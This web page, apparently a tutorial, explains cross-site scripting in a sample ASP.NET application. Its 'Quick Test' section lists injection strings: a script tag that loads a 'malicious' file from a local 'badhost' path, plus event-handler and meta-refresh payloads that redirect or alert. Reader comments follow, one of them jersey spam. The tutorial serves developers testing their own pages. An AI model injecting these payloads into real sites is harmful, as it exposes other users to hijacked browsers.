by Bryian Tan
Feedback
|
Average Rating: This article has not yet been rated.
Views (Total / Last 10 Days):
46871/
67
|
|
|
Cross-Site Scripting |
Cross-Site Scripting enables malicious attackers to inject
client-side script or HTML markup into web pages viewed by other users. This
can happen through the input form. Update the comment with the string "<script
src="http://localhost:9997/badhost/maliciousscript.js"></script>".
You should see a pop-up message when you navigate to
http://localhost:1234/Sample/ListComments.aspx page.
Figure 18
Quick Test
Update the form value with any of the string listed below
and observe the outcome. Make sure the string is in one line and no line break.
If the JavaScript executes successfully by the browser or displays unexpected
result then the web page is subjected to Cross-Site scripting.
<BODY ONLOAD=''javascript:window.location="http://www.google.com"''>
<BODY ONLOAD="javascript:alert(''XSS'')">
<p onmouseover=javascript:window.location="http://www. google.com";>test
<p onmousemove=javascript:window.location="http://www. google.com";>test
<p onMouseDown=javascript:window.location="http://www.google.com";>test
<span onmouseover=javascript:window.location="http://www. google.com";>test</span>
<span onmousemove=javascript:window.location="http://www.google.com";>test</span>
<h2 onmouseover=javascript:window.location="http://www.google.com";>test
<div onmouseover=javascript:window.location="http://1208929383";>test
<meta http-equiv="refresh" content="1; URL=http://1208929383">
<b onmouseover=javascript:window.location="http://www.google.com";
>test
<img onmouseover=javascript:window.location="http://www.google.com";>
<img src=http://www.google.com/images/srpr/nav_logo14.png width="1" height="1"
onLoad=javascript:window.location="http://www.google.com";>
<div style="width:100%"
onresize=javascript:window.location="http://www.google.com";>test</div>
(Resize the browser to see the behavior)
<tt style="width:100%"
onmousemove=javascript:window.location="http://www.google.com";>test
<PLAINTEXT> test
<object> test
<applet> test
<textarea> test
<title> test
<table> test
<style> test
<noscript> test
|
|
|
User Comments
Title:
NIKE NFL jerseys
Name:
NIKE NFL jerseys
Date:
2012-07-02 10:09:59 AM
Comment:
http://www.jersey2shop.com http://www.cheapjersey2store.com http://www.jerseycaptain.com http://www.yourjerseyhome.com We are professional jerseys manufacturer from china,wholesal.cheap nike nfl jerseys, mlb jerseys, nhl jerseys,nba jerseys and shoes Cheap NFL,NBA,MLB,NHL ,heap jerseys,2012 nike nfl Jerseys,nba jersey and shorts,oklahoma city thunder jersey,official jeremy lin new york knicks jersey,NFL Jerseys Wholesale,blake griffin jersey blue,NFL jerseys For Sale online.All Our Jerseys Are Sewn On and Directly From Chinese Jerseys Factory ,Wholesale cheap jerseys,Cheap mlb jerseys,]Nike NFL Jerseys,Cheap China Wholesae,Wholesale jerseys From China,2012 nike nfl Jerseys,Jerseys From China,,2012 nike nfl Jerseys,Revolution 30 nba jerseys,jersey of nba chicago bulls direk rose ,nfl jerseys,green bay packers jerseys wholesale,Buffalo Bills nike nfl jerseys sale,good supplier soccer jerseys,cool base mlb jerseys,Revolution 30 nba jerseys,2012 stanley cup nhl jersey, We are professional jerseys manufacturer from china,wholesal.cheap nike nfl jerseys, mlb jerseys, nhl jerseys,nba jerseys and shoes. www.yourjerseyhome.com
|
Title:
SQL Injection and Cross-Site Scripting
Name:
DINESH
Date:
2011-01-18 6:25:25 AM
Comment:
The best SQL Server Site Scripting
|
Title:
avrail
Name:
Refat Eid
Date:
2010-09-19 3:02:00 AM
Comment:
where can i found the TestDBSetup.sql ?
|
Title:
Really Good
Name:
Ankit Shivankar
Date:
2010-09-15 1:04:32 AM
Comment:
its really good.....and easy to understand
dear Bryian ... M facing some problem in my personal project can u help me.. if u can then plz contact me on mail id that is shiva.ankit@gmail.com
|
Title:
Download Link
Name:
Bryian Tan
Date:
2010-09-14 8:21:24 PM
Comment:
Hello,
Sorry, I think I forgot to include the download link. Anyway, please download the sample code from here http://download.ysatech.com/SQL-Injection-and-Cross-Site-Scripting/Sample_SQLInjection_XSS.zip
|
Title:
Gustavo
Name:
Fernandez
Date:
2010-09-14 3:19:45 PM
Comment:
Where is the link to download the code sample (TestDBSetup.sql)?
|
Title:
Senior programmer/analyst
Name:
Greg Hilsheimer
Date:
2010-09-14 2:16:39 PM
Comment:
where is link to download code
|
|
|
|